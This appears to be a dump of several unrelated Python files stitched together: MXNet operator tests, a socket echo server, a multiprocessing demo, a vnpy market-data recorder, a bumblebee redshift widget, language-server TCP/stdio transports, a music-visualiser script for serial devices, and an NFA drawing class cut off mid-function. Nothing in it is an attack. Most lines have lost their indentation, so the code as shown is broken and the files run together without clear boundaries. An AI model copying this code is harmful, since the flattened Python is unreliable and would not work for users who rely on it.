test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
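# Illustrative sketch, not part of the original tests: a worked instance of the
# output-size formula used by compute_output_size() inside test_im2col_col2im(),
#     out = (spatial + 2*pad - (dilate*(kernel - 1) + 1)) // stride + 1
# The helper name below is hypothetical and exists only for this illustration.
def _example_conv_output_size():
    spatial, kernel, stride, dilate, pad = 30, 3, 2, 2, 1
    dilated_kernel = dilate * (kernel - 1) + 1                # 2 * 2 + 1 = 5
    out = (spatial + 2 * pad - dilated_kernel) // stride + 1  # (32 - 5) // 2 + 1 = 14
    assert out == 14
    return out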
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
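# Illustrative note, not part of the original test: why 2 * nrepeat is expected
# above. After nrepeat multiplications b = 2 * a**nrepeat, so db/da equals
# 2 * nrepeat * a**(nrepeat - 1), which is 2 * nrepeat at a = 1. The helper
# name below is hypothetical.
def _example_expected_accumulated_grad(nrepeat, a=1.0):
    return 2 * nrepeat * a ** (nrepeat - 1)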
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
    a = mx.nd.arange(5000, dtype=dtype)
    b = mx.nd.arange(5000, dtype=dtype)
    e = mx.nd.arange(5000, dtype=dtype)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
    a = mx.nd.arange(5000, dtype=dtype)
    b = mx.nd.arange(5000, dtype=dtype)
    e = mx.nd.arange(5000, dtype=dtype)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
mx.util.set_np_shape(True) # Must be done to prevent zero-sized dimension conversion to 'unknown'
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
seq_last()
seq_reverse()
seq_mask()
def test_take_grads():
# Test for https://github.com/apache/incubator-mxnet/issues/19817
from mxnet.gluon.nn import HybridBlock, Conv1D, HybridSequential, HybridLambda, Dense
from mxnet import autograd, nd
from mxnet.gluon.loss import L2Loss
def get_grads(model, grads, ctx=mx.cpu()):
pd = model.collect_params()
total_grad_l2 = 0
total_grad_l1 = 0
total_grad_linf = 0
for p in pd:
try:
g = pd[p].grad(ctx) / N
g2 = (g**2).sum().as_in_context(mx.cpu()).asscalar()
g1 = g.abs().sum().as_in_context(mx.cpu()).asscalar()
ginf = g.max().as_in_context(mx.cpu()).asscalar()
total_grad_linf = max(total_grad_linf, ginf)
total_grad_l2 += g2
total_grad_l1 += g1
except Exception:
pass
grads.append(total_grad_l1)
grads.append(total_grad_l2)
grads.append(total_grad_linf)
def run_model(model, loss, X, Y, num_iters=5):
grads = []
for i in range(num_iters):
with autograd.record():
Y_hat = model(X)
ll = loss(Y_hat, Y)
ll = ll.sum()
ll.backward()
get_grads(model, grads)
return grads
def dense_layer():
den = HybridSequential()
den.add(Dense(10, flatten=True, activation='tanh'))
return den
class Model(HybridBlock):
def __init__(self, use_take=False, **kwargs):
super().__init__()
self.use_take = use_take
self.den = dense_layer()
def hybrid_forward(self, F, X, axis=1):
X1 = self.den(X)
if self.use_take:
X2 = F.take(X1, nd.array([0]), axis=axis)
else:
X2 = F.slice_axis(X1, begin=0, end=1, axis=axis)
return X2
N = 30
T = 20
C = 10
X = np.random.normal(size=(N, T, C))
Y = np.random.normal(size=(N, 1))
X, Y = nd.array(X), nd.array(Y)
seed = np.random.randint(1000)
# Using F.take
mx.random.seed(seed)
model = Model(use_take=True)
model.initialize()
loss = L2Loss()
grads1 = run_model(model, loss, X, Y)
# Using F.slice_axis
mx.random.seed(seed)
model2 = Model(use_take=False)
model2.initialize()
grads2 = run_model(model2, loss, X, Y)
for i in range(len(grads1)):
assert_almost_equal(grads1[i], grads2[i])
|
responder.py
|
import logging
import SocketServer
import time
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
logger = logging.getLogger(__name__)
class EchoRequestHandlerTCP(SocketServer.BaseRequestHandler):
def handle(self):
logger.debug('handle')
        # Echo the data back to the client
data = self.request.recv(1024)
logger.debug('received (tcp) from %s: "%s"',
self.client_address, data)
self.request.send(data)
return
class EchoRequestHandlerUDP(SocketServer.BaseRequestHandler):
def handle(self):
logger.debug('handle')
        # Echo the data back to the client
data = self.request[0]
socket = self.request[1]
logger.debug('received (udp) from %s: "%s"',
self.client_address, data)
socket.sendto(data, self.client_address)
return
class EchoServerTCP(SocketServer.TCPServer):
def serve_forever(self):
logger.info('waiting for tcp request')
while True:
self.handle_request()
return
class EchoServerUDP(SocketServer.UDPServer):
def serve_forever(self):
logger.info('waiting for udp request')
while True:
self.handle_request()
return
if __name__ == '__main__':
import socket
import threading
def check_socket(sock):
# Send the data
message = 'Hello world'
logger.debug('sending data: "%s"', message)
len_sent = sock.send(message)
# Receive a response
logger.debug('waiting for response')
response = sock.recv(len_sent)
logger.debug('response from server: "%s"', response)
tcp_addr = "0.0.0.0"
tcp_port = 80
udp_addr = "0.0.0.0"
udp_port = 69
tcp_server = EchoServerTCP((tcp_addr, tcp_port), EchoRequestHandlerTCP)
udp_server = EchoServerUDP((udp_addr, udp_port), EchoRequestHandlerUDP)
try:
t1 = threading.Thread(target=tcp_server.serve_forever)
t1.setDaemon(True) # don't hang on exit
t1.start()
t2 = threading.Thread(target=udp_server.serve_forever)
t2.setDaemon(True) # don't hang on exit
t2.start()
logger.info('TCP Server on %s:%s', tcp_addr, tcp_port)
logger.info('UDP Server on %s:%s', udp_addr, udp_port)
logger.debug('checking tcp server')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.debug('connecting to server')
s.connect((tcp_addr, tcp_port))
check_socket(s)
s.close()
logger.debug('checking udp server')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
logger.debug('connecting to server')
s.connect((udp_addr, udp_port))
check_socket(s)
s.close()
while True:
time.sleep(10)
finally:
# Clean up
logger.debug('done')
tcp_server.socket.close()
udp_server.socket.close()
logger.debug('closed sockets')
|
13_mutilprogress.py
|
# from random import randint
# from time import time, sleep
#
#
# def download_task(filename):
# print('Start downloading %s...' % filename)
# time_to_download = randint(5, 10)
# sleep(time_to_download)
# print('%s finished downloading! Took %d seconds' % (filename, time_to_download))
#
#
# def main():
# start = time()
# download_task('Python从入门到住院.pdf')
# download_task('Peking Hot.avi')
# end = time()
# print('Total elapsed time: %.2f seconds.' % (end - start))
#
#
# if __name__ == '__main__':
# main()
from multiprocessing import Process
from os import getpid
from random import randint
from time import time, sleep
def download_task(filename):
    print('Starting download process, PID [%d].' % getpid())
    print('Start downloading %s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
    print('%s finished downloading! Took %d seconds' % (filename, time_to_download))
def main():
start = time()
p1 = Process(target=download_task, args=('Python从入门到住院.pdf', ))
    # args is a tuple of the arguments passed to the target function
p1.start()
p2 = Process(target=download_task, args=('Peking Hot.avi', ))
p2.start()
p1.join()
p2.join()
end = time()
    print('Total elapsed time: %.2f seconds.' % (end - start))
if __name__ == '__main__':
main()
|
runDataRecording.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
处理错误事件
错误信息在每次登陆后,会将当日所有已产生的均推送一遍,所以不适合写入日志
"""
error = event.dict_['data']
    print u'Error code: %s, error message: %s' % (error.errorID, error.errorMsg)
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print '-'*20
    # Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
    le.info(u'Starting the market data recording child process')
ee = EventEngine2()
    le.info(u'Event engine created')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(dataRecorder)
    le.info(u'Main engine created')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
    le.info(u'Registered log and error event handlers')
me.connect('CTP')
    le.info(u'Connecting to the CTP interface')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
    # Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
    le.info(u'Starting the market data recording daemon parent process')
    DAY_START = time(8, 57)       # day session start and stop times
DAY_END = time(15, 18)
    NIGHT_START = time(20, 57)    # night session start and stop times
NIGHT_END = time(2, 33)
    p = None                      # handle of the child process
while True:
currentTime = datetime.now().time()
recording = False
        # Determine which time window the current time falls in
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
        # Filter out weekend periods: all of Saturday, the Friday night session and the Sunday day session
if ((datetime.today().weekday() == 6) or
(datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
(datetime.today().weekday() == 0 and currentTime < DAY_START)):
recording = False
        # During recording hours, the child process must be running
if recording and p is None:
            le.info(u'Starting child process')
p = multiprocessing.Process(target=runChildProcess)
p.start()
            le.info(u'Child process started successfully')
        # Outside recording hours, shut the child process down
if not recording and p is not None:
            le.info(u'Shutting down child process')
p.terminate()
p.join()
p = None
            le.info(u'Child process shut down successfully')
sleep(5)
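# Minimal sketch for illustration only (never called by this script): the
# session-window decision made inside runParentProcess(), factored into a pure
# function. The boundary times mirror the constants above; the function name
# and weekday handling are assumptions made for this sketch.
def _is_recording_time(now, weekday):
    day_start, day_end = time(8, 57), time(15, 18)
    night_start, night_end = time(20, 57), time(2, 33)
    recording = ((day_start <= now <= day_end) or
                 (now >= night_start) or
                 (now <= night_end))
    # Weekend filter, mirroring the checks in runParentProcess() above.
    if (weekday == 6 or
            (weekday == 5 and now > night_end) or
            (weekday == 0 and now < day_start)):
        recording = False
    return recording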
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
redshift.py
|
# pylint: disable=C0111,R0903
"""Displays the current color temperature of redshift
Requires the following executable:
* redshift
"""
import threading
import bumblebee.input
import bumblebee.output
import bumblebee.engine
import bumblebee.util
def is_terminated():
for thread in threading.enumerate():
if thread.name == "MainThread" and not thread.is_alive():
return True
return False
def get_redshift_value(widget):
while True:
if is_terminated():
return
widget.get("condition").acquire()
while True:
try:
widget.get("condition").wait(1)
except RuntimeError:
continue
break
widget.get("condition").release()
try:
res = bumblebee.util.execute("redshift -p")
except Exception:
res = ""
widget.set("temp", "n/a")
widget.set("transition", None)
for line in res.split("\n"):
if "temperature" in line.lower():
widget.set("temp", line.split(" ")[2])
if "period" in line.lower():
state = line.split(" ")[1].lower()
if "day" in state:
widget.set("state", "day")
elif "night" in state:
widget.set("state", "night")
else:
widget.set("state", "transition")
widget.set("transition", " ".join(line.split(" ")[2:]))
class Module(bumblebee.engine.Module):
def __init__(self, engine, config):
widget = bumblebee.output.Widget(full_text=self.text)
super(Module, self).__init__(engine, config, widget)
self._text = ""
self._condition = threading.Condition()
widget.set("condition", self._condition)
self._thread = threading.Thread(target=get_redshift_value, args=(widget,))
self._thread.start()
self._condition.acquire()
self._condition.notify()
self._condition.release()
def text(self, widget):
return "{}".format(self._text)
def update(self, widgets):
widget = widgets[0]
self._condition.acquire()
self._condition.notify()
self._condition.release()
temp = widget.get("temp", "n/a")
self._text = temp
transition = widget.get("transition", None)
if transition:
self._text = "{} {}".format(temp, transition)
def state(self, widget):
return widget.get("state", None)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
transports.py
|
from abc import ABCMeta, abstractmethod
import threading
import time
import socket
from queue import Queue
import subprocess
from .logging import exception_log, debug
try:
from typing import Callable, Dict, Any, Optional, IO
assert Callable and Dict and Any and Optional and subprocess and IO
except ImportError:
pass
ContentLengthHeader = b"Content-Length: "
ContentLengthHeader_len = len(ContentLengthHeader)
TCP_CONNECT_TIMEOUT = 5
try:
from typing import Any, Dict, Callable
assert Any and Dict and Callable
except ImportError:
pass
class UnexpectedProcessExitError(Exception):
pass
class Transport(object, metaclass=ABCMeta):
@abstractmethod
def __init__(self) -> None:
pass
@abstractmethod
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
pass
@abstractmethod
def send(self, message: str) -> None:
pass
@abstractmethod
def close(self) -> None:
pass
STATE_HEADERS = 0
STATE_CONTENT = 1
STATE_EOF = 2
StateStrings = {STATE_HEADERS: 'STATE_HEADERS',
STATE_CONTENT: 'STATE_CONTENT',
STATE_EOF: 'STATE_EOF'}
def state_to_string(state: int) -> str:
return StateStrings.get(state, '<unknown state: {}>'.format(state))
def start_tcp_listener(tcp_port: int) -> socket.socket:
sock = socket.socket()
sock.bind(('', tcp_port))
port = sock.getsockname()[1]
sock.settimeout(TCP_CONNECT_TIMEOUT)
debug('listening on {}:{}'.format('localhost', port))
sock.listen(1)
return sock
def start_tcp_transport(port: int, host: 'Optional[str]' = None) -> 'Transport':
start_time = time.time()
debug('connecting to {}:{}'.format(host or "localhost", port))
while time.time() - start_time < TCP_CONNECT_TIMEOUT:
try:
sock = socket.create_connection((host or "localhost", port))
return TCPTransport(sock)
except ConnectionRefusedError:
pass
# process.kill()
raise Exception("Timeout connecting to socket")
def build_message(content: str) -> str:
content_length = len(content)
result = "Content-Length: {}\r\n\r\n{}".format(content_length, content)
return result
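# For example (illustrative): build_message('{"id":1}') returns
# 'Content-Length: 8\r\n\r\n{"id":1}', the base-protocol framing that the
# transports below both produce and parse.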
class TCPTransport(Transport):
def __init__(self, socket: 'Any') -> None:
self.socket = socket # type: 'Optional[Any]'
self.send_queue = Queue() # type: Queue[Optional[str]]
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
self.on_receive = on_receive
self.on_closed = on_closed
self.read_thread = threading.Thread(target=self.read_socket)
self.read_thread.start()
self.write_thread = threading.Thread(target=self.write_socket)
self.write_thread.start()
def close(self) -> None:
self.send_queue.put(None) # kill the write thread as it's blocked on send_queue
self.socket = None
self.on_closed()
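    # read_socket() implements a small two-state parser over the raw byte
    # stream: in STATE_HEADERS it scans for the blank line after the
    # Content-Length header, in STATE_CONTENT it waits until that many body
    # bytes have arrived, dispatches them, and falls back to STATE_HEADERS.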
def read_socket(self) -> None:
remaining_data = b""
is_incomplete = False
read_state = STATE_HEADERS
content_length = 0
while self.socket:
is_incomplete = False
try:
received_data = self.socket.recv(4096)
except Exception as err:
exception_log("Failure reading from socket", err)
self.close()
break
if not received_data:
debug("no data received, closing")
self.close()
break
data = remaining_data + received_data
remaining_data = b""
while len(data) > 0 and not is_incomplete:
if read_state == STATE_HEADERS:
headers, _sep, rest = data.partition(b"\r\n\r\n")
if len(_sep) < 1:
is_incomplete = True
remaining_data = data
else:
for header in headers.split(b"\r\n"):
if header.startswith(ContentLengthHeader):
header_value = header[ContentLengthHeader_len:]
content_length = int(header_value)
read_state = STATE_CONTENT
data = rest
if read_state == STATE_CONTENT:
# read content bytes
if len(data) >= content_length:
content = data[:content_length]
self.on_receive(content.decode("UTF-8"))
data = data[content_length:]
read_state = STATE_HEADERS
else:
is_incomplete = True
remaining_data = data
def send(self, content: str) -> None:
self.send_queue.put(build_message(content))
def write_socket(self) -> None:
while self.socket:
message = self.send_queue.get()
if message is None:
break
else:
try:
self.socket.sendall(bytes(message, 'UTF-8'))
except Exception as err:
exception_log("Failure writing to socket", err)
self.close()
class StdioTransport(Transport):
def __init__(self, process: 'subprocess.Popen') -> None:
self.process = process # type: Optional[subprocess.Popen]
self.send_queue = Queue() # type: Queue[Optional[str]]
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
self.on_receive = on_receive
self.on_closed = on_closed
self.write_thread = threading.Thread(target=self.write_stdin)
self.write_thread.start()
self.read_thread = threading.Thread(target=self.read_stdout)
self.read_thread.start()
def close(self) -> None:
self.process = None
self.send_queue.put(None) # kill the write thread as it's blocked on send_queue
self.on_closed()
def _checked_stdout(self) -> 'IO[Any]':
if self.process:
return self.process.stdout
else:
raise UnexpectedProcessExitError()
def read_stdout(self) -> None:
"""
Reads JSON responses from process and dispatch them to response_handler
"""
running = True
pid = self.process.pid if self.process else "???"
state = STATE_HEADERS
content_length = 0
while running and self.process and state != STATE_EOF:
running = self.process.poll() is None
try:
# debug("read_stdout: state = {}".format(state_to_string(state)))
if state == STATE_HEADERS:
header = self._checked_stdout().readline()
# debug('read_stdout reads: {}'.format(header))
if not header:
# Truly, this is the EOF on the stream
state = STATE_EOF
break
header = header.strip()
if not header:
# Not EOF, blank line -> content follows
state = STATE_CONTENT
elif header.startswith(ContentLengthHeader):
content_length = int(header[ContentLengthHeader_len:])
elif state == STATE_CONTENT:
if content_length > 0:
content = self._checked_stdout().read(content_length)
self.on_receive(content.decode("UTF-8"))
# debug("read_stdout: read and received {} byte message".format(content_length))
content_length = 0
state = STATE_HEADERS
except IOError as err:
self.close()
exception_log("Failure reading stdout", err)
state = STATE_EOF
break
except UnexpectedProcessExitError:
self.close()
debug("process became None")
state = STATE_EOF
break
debug("process {} stdout ended {}".format(pid, "(still alive)" if self.process else "(terminated)"))
if self.process:
# We use the stdout thread to block and wait on the exiting process, or zombie processes may be the result.
returncode = self.process.wait()
debug("process {} exited with code {}".format(pid, returncode))
if returncode != 0:
self.close()
self.send_queue.put(None)
def send(self, content: str) -> None:
self.send_queue.put(build_message(content))
def write_stdin(self) -> None:
while self.process:
message = self.send_queue.get()
if message is None:
break
else:
try:
msgbytes = bytes(message, 'UTF-8')
try:
self.process.stdin.write(msgbytes)
except AttributeError:
return
self.process.stdin.flush()
except (BrokenPipeError, OSError) as err:
exception_log("Failure writing to stdout", err)
self.close()
|
psychroom.py
|
#
# This script plays an mp3 file and communicates via serial.Serial
# with devices in the Technites psychedelic room to visualize the
# music on them.
#
# It talks to 4 devices
# WaterFall -- tubes with LEDs and flying stuff fanned to music
# DiscoBall -- 8 60 watt bulbs wrapped in colored paper
# LEDWall -- a 4 channel strip of LED
# this time it was the LED roof instead :p
# LEDCube -- a 10x10x10 LED cube - work on this is still on
#
# the script also has a sloppy pygame visualization of the fft and
# beats data
#
import sys
import time
import scipy
import pygame
from pygame import display
from pygame.draw import *
import pathsetup # this module sets up PYTHONPATH for all this to work
from devices.discoball import DiscoBall
from devices.waterfall import Waterfall
from devices.ledwall import LEDWall
from devices.cube import Cube
from devices.rgbcube import RGBCube
import phosphene
from phosphene import audio, signalutil, util
from phosphene.util import *
from phosphene.signal import *
from phosphene.dsp import *
from phosphene.graphs import *
from phosphene.signalutil import *
from cube import cubeProcess
#from phosphene import cube
from threading import Thread
# Setup devices with their corresponding device files
devs = [
#Waterfall("/dev/ttyACM5"),
#DiscoBall("/dev/ttyACM8"),
LEDWall("/dev/ttyACM0")
]
pygame.init()
surface = display.set_mode((640, 480))
if len(sys.argv) < 2:
print "Usage: %s file.mp3" % sys.argv[0]
sys.exit(1)
else:
fPath = sys.argv[1]
sF, data = audio.read(fPath)
import serial
signal = Signal(data, sF)
signal.A = lift((data[:,0] + data[:,1]) / 2, True)
signal.beats = lift(lambda s: numpymap(lambda (a, b): 1 if a > b * 1.414 else 0, zip(s.avg8, s.longavg8)))
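# signal.beats is a per-band beat flag: a band reads 1 when its short-term
# average (avg8) exceeds its long-term average (longavg8) by a factor of
# sqrt(2) ~= 1.414; avg8/longavg8 are assumed to be provided by phosphene's
# signalutil.setup() call further below.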
for d in devs:
d.setupSignal(signal)
def devices(s):
#threads = []
for d in devs:
if d.isConnected:
def f():
d.redraw(s)
#t = Thread(target=f)
#threads.append(t)
#t.start()
f()
#for t in threads:
# t.join(timeout=2)
# if t.isAlive():
# d.isUnresponsive()
surface.fill((0, 0, 0))
graphsGraphs(filter(
lambda g: g is not None,
[d.graphOutput(signal) for d in devs]))(surface, (0, 0, 640, 480))
CubeState = lambda: 0
CubeState.count = 0
cube = RGBCube("/dev/ttyACM2",4)
def cubeUpdate(signal):
if signal.beats[0] or signal.beats[1] or signal.beats[2] or signal.beats[3]:
CubeState.count = cubeProcess(cube, signal, CubeState.count)
def graphsProcess(s):
display.update()
processes = [graphsProcess, devices, cubeUpdate]
signal.relthresh = 1.66
soundObj = audio.makeSound(sF, data)
# make a pygame Sound object from the data
def sendingThread():
while True:
bs = cube.toByteStream()
cube.port.write("S")
print "Wrote S"
readValue = cube.port.read()
print readValue
for j in range(0,4):
for i in range(0,3):
cube.port.write(chr(bs[i][2*j]))
print "wrote", bs[i][2*j]
#time.sleep(0.0001)
cube.port.write(chr(bs[i][2*j+1]))
print "wrote", bs[i][2*j+1]
#time.sleep(0.0001)
t = Thread(target=sendingThread)
t.start()
# run setup on the signal
signalutil.setup(signal)
soundObj.play() # start playing it. This is non-blocking
perceive(processes, signal, 36) # perceive your signal.
|
drawable_nfa.py
|
from nfa import NFA
from drawable_state import DrawableState
from drawable_dfa import DrawableDFA
from threading import Thread
from time import sleep
class DrawableNFA(NFA):
def __init__(self, alphabet = ['0','1'], x = 60, y = 355):
self._alphabet = alphabet + ['']
self._states = [DrawableState(True, False, x, y)]
self._transitions = {(s, c) : [] for s in self._states for c in self._alphabet}
self._selected = None
self._callback = None
self._choosingChar = False
self._chosenChar = ''
def draw(self):
for (src, wth) in self._transitions:
for dst in self._transitions[(src,wth)]:
self._drawArrow(src, wth, dst)
for state in self._states:
state.draw()
if self._selected == state:
stroke(0)
fill(0,0,0,0)
rectMode(CENTER)
rect(state.getX(),state.getY(), 60, 60)
src = state
for dst in self._states:
chars = [(c if c != '' else '\\e') for c in self._alphabet if (src, c) in self._transitions and dst in self._transitions[(src,c)]]
txt = ', '.join(chars)
pushMatrix()
sx, sy, dx, dy = src.getX(), src.getY(), dst.getX(), dst.getY()
translate((sx + dx) / 2, (sy + dy) / 2)
nsx, nsy, ndx, ndy = (sx - dx) / 2, (sy - dy) / 2, (dx - sx) / 2, (dy - sy) / 2
a = atan2(ndy - nsy,ndx - nsx)
rotate(a)
textSize(25)
textAlign(CENTER)
fill(0,0,0,255)
translate(0, dist(sx,sy,dx,dy) / 3 + 30)
rotate(-a)
text(txt, 0, 0)
popMatrix()
if self._choosingChar:
fill(0)
textSize(30)
textAlign(CENTER)
text('Choose a character of the transition and hit enter', width / 2, height / 3)
def _drawArrow(self, src, wth, dst):
sx, sy, dx, dy = src.getX(), src.getY(), dst.getX(), dst.getY()
fill(0,0,0,0)
pushMatrix()
translate((sx + dx) / 2, (sy + dy) / 2)
nsx, nsy, ndx, ndy = (sx - dx) / 2, (sy - dy) / 2, (dx - sx) / 2, (dy - sy) / 2
a = atan2(ndy - nsy,ndx - nsx)
rotate(a)
stroke(0)
arc(0,0, dist(sx, sy, dx, dy), 2 * dist(sx,sy,dx,dy) / 3, 0, PI)
popMatrix()
def analyze(self, message):
t = Thread(target = self._analyze, args = (message,))
